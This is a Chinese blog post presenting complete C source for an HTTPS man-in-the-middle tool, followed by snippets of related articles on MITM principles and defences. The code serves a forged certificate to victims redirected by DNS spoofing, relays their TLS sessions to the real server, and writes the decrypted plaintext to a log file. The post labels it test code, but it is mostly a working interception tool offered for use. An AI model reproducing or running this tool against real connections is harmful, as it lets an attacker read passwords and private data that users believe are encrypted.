HTTPS中间人攻击

最新推荐文章于 2024-08-17 06:00:00 发布
最新推荐文章于 2024-08-17 06:00:00 发布
阅读量1.7k 收藏 3
点赞数
文章标签: ssl socket server buffer null thread
by 云舒
一段测试性质的代码,自己做一个伪造的证书,然后使用DNS SPOOF 引导被攻击者访问攻击者机器,攻击者作为中间人记录明文的数据传输。附件里面是我测试时使用的伪造的证书,使用OPENSSL生成的。

代码:

#include <stdio.h>
#include <winsock2.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

#pragma comment ( lib, "libeay32.lib" )
#pragma comment ( lib, "ssleay32.lib" )
#pragma comment ( lib, "ws2_32.lib" )

#define    PRIVATE_KEY_PWD        "1234"
#define    CERT_FILE            "yunshu.crt"
#define    KEY_FILE            "yunshu.key"
#define    MAX_USER            10
#define    LISTEN_PORT            443
#define    TIME_OUT            1000000    // 1秒

#define    DEBUG

#ifdef DEBUG
    #define    LOG_FILE            "c:/https.txt"
    // 记录数据到文件
    void    Log_File( char *str );
#endif


// 目的主机
char            target_host[20] = { 0 };
unsigned int    target_port = 0;

// 输出SSL错误函数
void    SSL_Error( char *custom_string );


// 初始化SSL库作为服务端
SSL        *Server_SSL_Init( );

// 初始化SSL库作为客户端
SSL        *Client_SSL_Init( );

// 初始化Socket作为服务端
SOCKET    Server_Socket_Init( );

// 初始化Socket作为客户端
SOCKET    Client_Socket_Init( );

// 处理客户端函数
void    WINAPI    FowardPacket( LPVOID argument );

// 程序入口,主函数
int main( int argc, char *argv[] )
{
    if( argc != 3 )
    {
        printf( "Usage: %s   <target_host>   <target_port>/n", argv[0] );
        printf( "Code by 云舒,just for test!/n" );

        return -1;
    }

    SOCKET    server_sock = Server_Socket_Init( );
    if( INVALID_SOCKET == server_sock )
    {
        return -1;
    }
    
    // 加载加密算法库
    SSL_library_init( );

    // 加载错误信息库
    SSL_load_error_strings( );

    // 开始接受连接
    SOCKET            client_sock;        // 来自被攻击者的socket
    SOCKADDR_IN        client_sin;
    int                sin_len = sizeof(SOCKADDR_IN);

    target_port = atoi( argv[2] );
    struct hostent *phost = gethostbyname( argv[1] );
    if( phost == NULL )
    {
        printf( "Resolve %s error!/n" , argv[1] );
        return -1;
    }
    memset( (void *)&client_sin, 0, sizeof(SOCKADDR_IN) );
    memcpy( &client_sin.sin_addr , phost->h_addr_list[0] , phost->h_length );
    strcpy( target_host, inet_ntoa( client_sin.sin_addr ) );
    printf( "Target host is %s(%s), port is %d/n", target_host, argv[1], target_port );

    memset( (void *)&client_sin, 0, sizeof(SOCKADDR_IN) );
    while( TRUE )
    {
        client_sock = accept( server_sock, (struct sockaddr *)&client_sin, &sin_len );

        printf( "connect from %s/n", inet_ntoa( client_sin.sin_addr ) );
        
        if( SOCKET_ERROR == client_sock )
        {
            printf( "accept error./n" );
            continue;
        }

        HANDLE    h_thread;
        DWORD    thread_id = 0;

        h_thread = CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)FowardPacket, (LPVOID)&client_sock, 0, &thread_id );
        if( NULL == h_thread )
        {
            printf( "create thread error./n" );
        }

        CloseHandle( h_thread );
    }

    closesocket( server_sock );    
    WSACleanup( );

    return 0;
}

void WINAPI FowardPacket( LPVOID argument )
{
    char    buffer[2048] = { 0 };

    // 生成SSL,作为服务端,响应被攻击者的请求
    SSL    *server_ssl = Server_SSL_Init( );
    if( NULL == server_ssl )
    {
        return;
    }

    printf( "Init ssl as server success!/n" );

    // 生成SSL,作为客户端,向真实主机发起请求
    SSL    *client_ssl = Client_SSL_Init( );
    if( NULL == client_ssl )
    {
        return;
    }

    printf( "Init ssl as client success!/n" );

    // 作为服务端端的socket,响应被攻击者的请求
    SOCKET    server_sock = (SOCKET)(*(SOCKET *)argument);

    // 绑定ssl和socket,此处作为被攻击者的服务器
    SSL_set_fd( server_ssl, server_sock );

    int ret = SSL_accept( server_ssl );
    if( -1 == ret )
    {
        SSL_Error( "SSL_accept error" );
        return;
    }

    // 作为客户端的socket,向真实主机发起请求
    SOCKET    client_sock = Client_Socket_Init( );
    if( INVALID_SOCKET == client_sock )
    {
        return;
    }
    
    SSL_set_fd( client_ssl, client_sock );
    ret = SSL_connect( client_ssl );
    if( -1 == ret )
    {
        SSL_Error( "SSL_connect error" );
        return;
    }

    fd_set    fd_read;
    timeval    time_out;

    while( TRUE )
    {
        time_out.tv_sec = 0;
        time_out.tv_usec = TIME_OUT;

        FD_ZERO( &fd_read );
        FD_SET( server_sock, &fd_read );
        FD_SET( client_sock, &fd_read );

        ret = select( 0, &fd_read, NULL, NULL, &time_out );
        if( SOCKET_ERROR == ret )
        {
            printf( "socket error: %d/n", GetLastError() );
            break;
        }
        else if( 0 == ret )
        {
            continue;
        }
        else
        {
            if( FD_ISSET( server_sock, &fd_read ) )
            {
                memset( (void *)buffer, 0, sizeof(buffer) );

                ret = SSL_read( server_ssl, buffer, sizeof(buffer) );
                if( ret > 0 )
                {
                    ret = SSL_write( client_ssl, buffer, strlen(buffer) );
                    if( strlen(buffer) != ret )
                    {
                        SSL_Error( "Send data to real server error" );
                    }
                    else
                    {
                        printf( "send %d bytes to real server/n", ret );
                        
                        #ifdef DEBUG
                            Log_File( buffer );
                        #endif
                    }
                }
            }
            else if( FD_ISSET( client_sock, &fd_read ) )
            {
                memset( (void *)buffer, 0, sizeof(buffer) );

                ret = SSL_read( client_ssl, buffer, sizeof(buffer) );
                if( ret > 0 )
                {
                    //printf( "RESPONSE:/n/t%s/n", buffer );

                    ret = SSL_write( server_ssl, buffer, strlen(buffer) );
                    if( strlen(buffer) != ret )
                    {
                        SSL_Error( "Send data to customer error" );
                    }
                    else
                    {
                        printf( "send %d bytes to customer's host/n", ret );
                        
                        #ifdef DEBUG
                            Log_File( buffer );
                        #endif
                    }
                }
            }
        }
    }
    
    SSL_shutdown( server_ssl );
    SSL_shutdown( client_ssl );
    SSL_free( server_ssl );
    SSL_free( client_ssl );

    closesocket( server_sock );
    closesocket( client_sock );

    return;
}

void SSL_Error( char *custom_string )
{
    char    error_buffer[256] = { 0 };
    
    printf( "%s, ", custom_string );
    ERR_error_string( ERR_get_error(), error_buffer );
    printf( "%s/n", error_buffer );
}

SSL    *Server_SSL_Init( )
{
    // 加载SSL环境
    SSL_CTX    *server_ctx = SSL_CTX_new( SSLv23_server_method() );
    if( NULL == server_ctx )
    {
        SSL_Error( "Init ssl ctx error" );
        return NULL;
    }

    // 设置证书文件的口令
    SSL_CTX_set_default_passwd_cb_userdata( server_ctx, PRIVATE_KEY_PWD );

    // 加载证书
    if( SSL_CTX_use_certificate_file( server_ctx, CERT_FILE, SSL_FILETYPE_PEM ) <= 0 )
    {
        SSL_Error( "Load cert file error" );
        return NULL;
    }

    // 加载私钥
    if( SSL_CTX_use_PrivateKey_file( server_ctx, KEY_FILE, SSL_FILETYPE_PEM ) <= 0 )
    {
        SSL_Error( "Load cert file error" );
        return NULL;
    }

    // 检查私钥和证书是否匹配
    if( !SSL_CTX_check_private_key( server_ctx ) )
    {
        printf( "Private key does not match the certificate public key/n" );
        return NULL;
    }

    SSL    *ssl = SSL_new (server_ctx);
    if( NULL == ssl )
    {
        SSL_Error( "Create ssl error" );
        return NULL;
    }

    return ssl;
}

SSL    *Client_SSL_Init( )
{
    SSL_CTX    *client_ctx;

    client_ctx = SSL_CTX_new( SSLv23_client_method() );

    if( NULL == client_ctx )
    {
        SSL_Error( "Init ssl ctx error" );
        return NULL;
    }

    SSL    *ssl = SSL_new (client_ctx);
    if( NULL == ssl )
    {
        SSL_Error( "Create ssl error" );
        return NULL;
    }

    return ssl;
}

SOCKET    Server_Socket_Init( )
{
    WSADATA        wsa;

    WSAStartup( 0x0202, &wsa );
    
    SOCKET    sock = socket( AF_INET, SOCK_STREAM, 0 );
    if( INVALID_SOCKET == sock )
    {
        printf( "Create socket as a server error" );
        return INVALID_SOCKET;
    }

    SOCKADDR_IN    server_sin;
    memset( (void *)&server_sin, 0, sizeof(SOCKADDR_IN) );

    server_sin.sin_family = AF_INET;
    server_sin.sin_addr.S_un.S_addr = INADDR_ANY;
    server_sin.sin_port = htons( 443 );

    int    ret = bind( sock, (struct sockaddr *)&server_sin, sizeof(SOCKADDR_IN) );
    if( SOCKET_ERROR == ret )
    {
        printf( "bind error: %d/n", GetLastError() );
        return INVALID_SOCKET;
    }

    ret = listen( sock, MAX_USER );
    if( SOCKET_ERROR == ret )
    {
        printf( "listen error./n" );
        return INVALID_SOCKET;
    }

    printf( "Listening on all local ip address, waiting for connect.../n" );

    return sock;
}

SOCKET    Client_Socket_Init( )
{
    SOCKET    client_sock = socket( AF_INET, SOCK_STREAM, 0 );

    if( INVALID_SOCKET == client_sock )
    {
        printf( "create socket as a client error./n" );
        return -1;
    }
    
    SOCKADDR_IN        client_sin;
    memset( (void *)&client_sin, 0, sizeof(SOCKADDR_IN) );

    client_sin.sin_family = AF_INET;
    client_sin.sin_addr.S_un.S_addr = inet_addr( target_host );
    client_sin.sin_port = htons( target_port );

    int ret = connect( client_sock, (struct sockaddr *)&client_sin, sizeof(SOCKADDR_IN) );
    if( SOCKET_ERROR == ret )
    {
        printf( "connect to real server %s error", target_host );
        return INVALID_SOCKET;
    }

    printf( "connect to real server success!/n" );

    return client_sock;
}

#ifdef    DEBUG
void    Log_File( char * str )
{
    FILE    *fp = fopen( LOG_FILE, "w+" );
    if( NULL == fp )
    {
        return;
    }

    fputs( str, fp );
    
    fclose( fp );
}
#endif
 
iiprogram
关注
简述HTTPS中间人攻击
liuhao9999的博客
03-22 1663
https协议由 http + ssl 协议构成,具体的链接过程可参考SSL或TLS握手的概述 中间人攻击过程如下: 服务器向客户端发送公钥。 攻击者截获公钥,保留在自己手上。 然后攻击者自己生成一个【伪造的】公钥,发给客户端。 客户端收到伪造的公钥后,生成加密hash值发给服务器。 攻击者获得加密hash值,用自己的私钥解密获得真秘钥。 同时生成假的加密hash值,发给服务器。 服务器用私钥解密获得假秘钥。 服务器用加秘钥加密传
面试题目总结(1) https中间人攻击,ConcurrentHashMap的原理 ,serialVersionUID常量,redis单线程,
qq_52252193的博客
06-29 358
https是 对http内容的加密,中间人攻击是指攻击者通过与客户端和客户端的目标服务器同时建立连接,作为客户端和服务器的桥梁,处理双方的数据,整个会话期间的内容几乎是完全被攻击者控制的。攻击者可以拦截双方的会话并且插入新的数据内容。扩展 https 的工作过程 因为 hashmap 如果插入元素超过了容量的范围(负载因子决定)就会 触发扩容操作, 他会把原来的数组内容 重新 hash 到新的扩容数组中, 在多线程的情况下,jdk 1.7 采用头插法插入链表元素,会造成 扩容死链,jdk
HTTPS中间人攻击实践(原理·实践)
weixin_30492047的博客
03-19 600
前言 很早以前看过HTTPS的介绍,并了解过TLS的相关细节,也相信使用HTTPS是相对安全可靠的。直到前段时间在验证https代理通道连接时,搭建了MITM环境,才发现事实并不是我想的那样。由于部分应用开发者忽视证书的校验,或者对非法证书处理不当,让我们的网络会话几乎暴露在攻击者面前。 下文会向大家展示的对IOS系统上2款常见的应用(知乎,360浏览器)进行MITM攻击,获取...
一文了解“中间人攻击(MITM)”(附防范建议)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-17 822
此外,在使用公共Wi-Fi连接时,请留意浏览器的安全警告。作为一种由来已久的网络入侵手段,MITM攻击依赖于控制人、计算机或服务器之间的通信路线,它并不总是需要一台受感染的计算机,这就意味着存在多种攻击途径。但是,攻击者可以劫持重定向过程,将指向其自建服务器的链接植入其中,进而窃取您的敏感数据以及您输入的所有凭据。因此,理论上来说,攻击者可以利用这种短暂的时间差,在HSTS配置到位之前使用SSL剥离之类的中间人攻击。例如,有人拦截了你发布的消息,对其进行了读取和重新打包,然后将其发回给您或您的原始收件人。
https中间人攻击
weixin_30783629的博客
08-15 166
攻击过程: 服务器向客户端发送公钥。 攻击者截获公钥,保留在自己手上。 然后攻击者自己生成一个【伪造的】公钥,发给客户端。 客户端收到伪造的公钥后,生成加密hash值发给服务器。 攻击者获得加密hash值,用自己的私钥解密获得真秘钥。 同时生成假的加密hash值,发给服务器。 服务器用私钥解密获得假秘钥。 服务器用加秘钥假密传输信息 防范方法: 服务端在发...
基于HTTPS中间人攻击-BaseProxy
七夜的博客
07-11 2655
前言 在上一篇文章BaseProxy:异步http/https代理中,我介绍了自己的开源项目BaseProxy,这个项目的初衷其实是为了渗透测试,抓包改包。在知识星球中,有很多朋友问我这个项目的原理及实现代码,本篇文章就讲解一下和这个项目相关的HTTPS中间人攻击HTTPS隧道代理 HTTPS隧道代理简单来说是基于TCP协议数据透明转发,在RFC中,为这类代理给出了规范,Tunne...
Https中间人攻击
yshir
11-04 4542
Https中间人攻击 https协议由 http + ssl 协议构成,具体的链接过程可参考SSL或TLS握手的概述 中间人攻击过程如下: 服务器向客户端发送公钥。 攻击者截获公钥,保留在自己手上。 然后攻击者自己生成一个【伪造的】公钥,发给客户端。 客户端收到伪造的公钥后,生成加密hash值发给服务器。 攻击者获得加密hash值,用自己的私钥解密获得真秘钥。 同时生成假的加密hash值,发给服务器。 服务器用私钥解密获得假秘钥。 服务器用加秘钥加密传输信息 防范方法: 服务端在发.
HTTPS中间人攻击与证书校验(一)1
08-03
《谈HTTPS中间人攻击与证书校验(一)》 一、引言 随着网络安全意识的提高,HTTPS作为安全通信的基石,已经被广泛应用于互联网领域。然而,由于开发者对HTTPS理解不足,时常出现未验证证书的情况,从而为“中间人...
05-https中间人攻击.md
03-31
大厂前端面试|# 开始 前端工程师有很多,而是技能全面、独当一面的前端工程师到哪里都是“香饽饽”,企业争抢。所以,技术广度将决定你的稀缺性,以及未来的发展空间。本章将通过多个面试题,讲解前端面试常考的...
web安全——HTTPS中间人攻击
Novice-XiaoSong的博客
11-20 701
一、中间人攻击过程 正常HTTPS通道建立过程 客户端向服务器发送HTTPS请求 服务器返回公钥 客户端生成私钥,并使用公钥加密,发送给服务器 服务器使用与公钥配对的私钥解密,获取客户端生成的私钥 客户端、服务器使用协商好的私钥进行加密数据传输 中间人攻击 客户端向服务器发送HTTPS请求 服务器返回公钥 2.1. 中间人劫持服务器数据,备份公钥,生成假公钥,返回给客户端 客户端生成私钥,并使用假公钥加密,发送给服务器 3.1. 中间人劫持客户端数据,使用与假公钥配对的假私钥解密获取客户端生成的私钥(
【安全系列】https中间人攻击
叁滴水 的博客
08-28 3238
https相对http更加安全,然而https并不是那么完美,中间人还是可以通过很多手段来绕过https,比如https证书伪造,或者强制转换http协议,或者加密降级等等。
HTTPS攻击(SSL/TLS中间人攻击
初学者L_言的博客
03-01 2927
一、场景环境 攻击机: kali 目标机: WinServer 2003 二、原理 攻击前提: 客户端已经信任伪造证书颁发机构; 攻击者控制了核发证书颁发机构; 客户端程序禁止了显示证书错误告警信息; 攻击者已经控制客户端,并强制其信任伪造证书。 角色: 客户端、客户路由器、真实服务器、攻击者代理服务器 (攻击者代理服务器)攻击者 通过ARP欺骗客户端通过攻击者做网关,数据包通过攻击者发出。此...
HTTPSHTTPS中间人攻击
weixin_34041003的博客
08-01 292
HTTPSHTTPS中间人攻击,全站HTTPS正在称为潮流趋势,国内实现全站https的有淘宝和百度两家。 一、https的作用 C I A:机密性,完整性,可用性(可用性是合法用户可以访问自己有权限访问的资源) 解决的是信息传输中数据被篡改、窃取 加密:对称、非对称、单向 二、https工作原理 https的工作原理还是有必要研究下的(原理我也是从...
老弟,你连HTTPS 原理都不懂,还给我讲“中间人攻击”,逗我吗...
朱小厮的博客
12-07 2271
点击上方“朱小厮的博客”,选择“设为星标”后台回复”加群“加入公众号专属技术群来源:urlify.cn/zQj6f2这篇干货不错,把HTTPS的原理讲清楚了,而且容易懂,建议大家好好读一...
https中间人攻击和防范
CoderAldrich的专栏
09-09 933
https中间人攻击和防范 这里的中间人场景主要是Windows平台下的C/S架构劫持,技术指的是SSL劫持攻击,即SSL欺骗,剥离攻击暂不涉及。整体原理是伪造证书,既充当请求方的server角色,又充当真正server的请求方。以此来获取和篡改通信的明文报文数据。 整体流程 使用openSSL制作证书 编写代理程序 根证书添加到可信任发布机构 设置系统代理 证书制作 首先装个openSSL,安装包下载地址:http://slproweb.com/products/Win32OpenSSL.html
HTTPS的加密技术——中间人攻击
闲来垂钓碧溪上的博客
05-24 1995
https是基于http的一层加密技术,有两种加密方式,针对不同的数据传输可以使用不同加密算法结合使用,最常用也最安全的是双重加密技术,不过单独使用还是会有风险,对于中间人攻击这个算法也会被偷梁换柱,于是需要引入证书对症下药,以此来保障数据的安全性和完整性。
了解 HTTPS 中间人攻击:保护你的网络安全
你若盛开,清风自来
03-09 1829
HTTPS 中间人攻击是一种常见的网络安全威胁,它可以通过截取、篡改和重新发送 HTTPS 通信数据来窃取敏感信息。本文将介绍 HTTPS 中间人攻击的原理、危害以及如何防范此类攻击。HTTPS 中间人攻击是一种危险的网络安全威胁,了解其原理和危害,采取有效的防范措施,对我们保护个人信息和网络安全至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值